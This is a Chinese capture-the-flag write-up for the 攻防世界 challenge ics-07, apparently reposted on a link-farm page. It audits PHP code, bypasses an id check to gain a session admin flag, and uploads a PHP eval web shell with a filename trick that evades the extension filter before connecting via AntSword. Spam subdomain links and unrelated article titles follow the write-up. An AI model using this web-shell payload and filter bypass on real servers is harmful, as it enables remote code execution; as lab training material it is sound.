当前位置: 首页 > news >正文

攻防世界-ics-07

进入环境

进入项目管理

点击进行访问

是一堆代码进行审计

<?php
session_start();if (!isset($_GET[page])) {show_source(__FILE__);die();
}if (isset($_GET[page]) && $_GET[page] != 'index.php') {include('flag.php');
}else {header('Location: ?page=flag.php');
}

如果传入的参数page的值不是index.php,则包含flag.php,否则重定向到?page=flag.php

<?php
if ($_SESSION['admin']) {$con = $_POST['con'];$file = $_POST['file'];$filename = "backup/".$file;if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)){die("Bad file extension");}else{chdir('uploaded');$f = fopen($filename, 'w');fwrite($f, $con);fclose($f);}
}
?>

POST提交con和file两个参数

<?php
if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') {include 'config.php';$id = mysql_real_escape_string($_GET[id]);$sql="select * from cetc007.user where id='$id'";$result = mysql_query($sql);$result = mysql_fetch_object($result);
} else {$result = False;die();
}if(!$result)die("<br >something wae wrong ! <br>");
if($result){echo "id: ".$result->id."</br>";echo "name:".$result->user."</br>";$_SESSION['admin'] = True;
}
?>

参考up主@愚公搬代码

需要获取一个id参数, 并且id不为1,且最后一位等于9

floatval 函数用于获取变量的浮点值

?page=flag.php&id=1xx9

上传木马

con=<?php @eval($_POST[cmd]);?>&file=test.php/1.php/..

访问/uploaded/backup/目录,发现上传成功

连接蚁剑

注意:点开代理设置选择不使用代理,电脑连接的网络不要是校园网或者公司网络,因为一般像这种企业级的wifi都会在顶部做一些防护手段来保证安全性。所以可以自己开热点进行连接。

点击测试连接,显示成功,点击添加,右键进入文件管理

cyberpeace{7720e85e876c98f3fb088ebd5dcaff1e}


文章转载自:
http://afdc.jopebe.cn
http://ceskoslovensko.jopebe.cn
http://anotherguess.jopebe.cn
http://betain.jopebe.cn
http://canopied.jopebe.cn
http://ameba.jopebe.cn
http://biscayne.jopebe.cn
http://antiquate.jopebe.cn
http://boilover.jopebe.cn
http://ceo.jopebe.cn
http://burgle.jopebe.cn
http://chd.jopebe.cn
http://biracial.jopebe.cn
http://aimless.jopebe.cn
http://afterschool.jopebe.cn
http://blindly.jopebe.cn
http://armament.jopebe.cn
http://beiruti.jopebe.cn
http://cholangiography.jopebe.cn
http://actinomorphous.jopebe.cn
http://antiketogenesis.jopebe.cn
http://captainship.jopebe.cn
http://advisable.jopebe.cn
http://caricous.jopebe.cn
http://casket.jopebe.cn
http://bimorph.jopebe.cn
http://biodynamic.jopebe.cn
http://aircondition.jopebe.cn
http://avast.jopebe.cn
http://cess.jopebe.cn
http://www.dtcms.com/a/216094.html

相关文章:

  • 多租户架构详解:从概念到实现的方法说明
  • 声动心弦 - 校园音乐分享平台的数字交响-测试报告
  • 组合型回溯+剪枝
  • 以少学习:通过无标签数据从大型语言模型进行知识蒸馏
  • 2025年上半年第1批信息系统项目管理师论文真题解析与范文
  • 树莓派(Raspberry Pi)安装Docker教程
  • EfficientLLM: Efficiency in Large Language Models 高效大模型
  • 飞牛fnNAS之手机访问篇
  • 数据结构中无向图的邻接矩阵详解
  • Tic10024介绍
  • 数据清洗之处理缺失点
  • 蓝凌EKP平台表单控件升级:一行配置引入LayUI新UI体验
  • 74系列数字电路时钟冒险解决
  • v4.0 论文投稿-Latex论文投稿注意事项
  • ShardingSphere-读写分离
  • 2024 CKA模拟系统制作 | Step-By-Step | 10、题目搭建-调度 pod 到指定节点
  • 树莓派安装中文字体和中文输入法
  • 鸿蒙OSUniApp 开发支持图片和视频的多媒体展示组件#三方框架 #Uniapp
  • 基线配置管理:为什么它对网络稳定性至关重要
  • java上机测试错题回顾(2)
  • 鸿蒙OSUniApp 开发的商品筛选器与排序功能#三方框架 #Uniapp
  • 互联网大厂Java求职面试:从Spring到微服务的技术探讨
  • 预约按摩小程序源码介绍
  • 数据泄露频发,Facebook的隐私保护是否到位?
  • 青少年编程与数学 02-020 C#程序设计基础 07课题、控制结构
  • 理解vue-cli中的webpack
  • RabbitMQ搭建集群
  • kafka SASL/PLAIN 认证及 ACL 权限控制
  • Python整合Milvus向量数据库案例实战
  • 【Opencv+Yolo】Day2_图像处理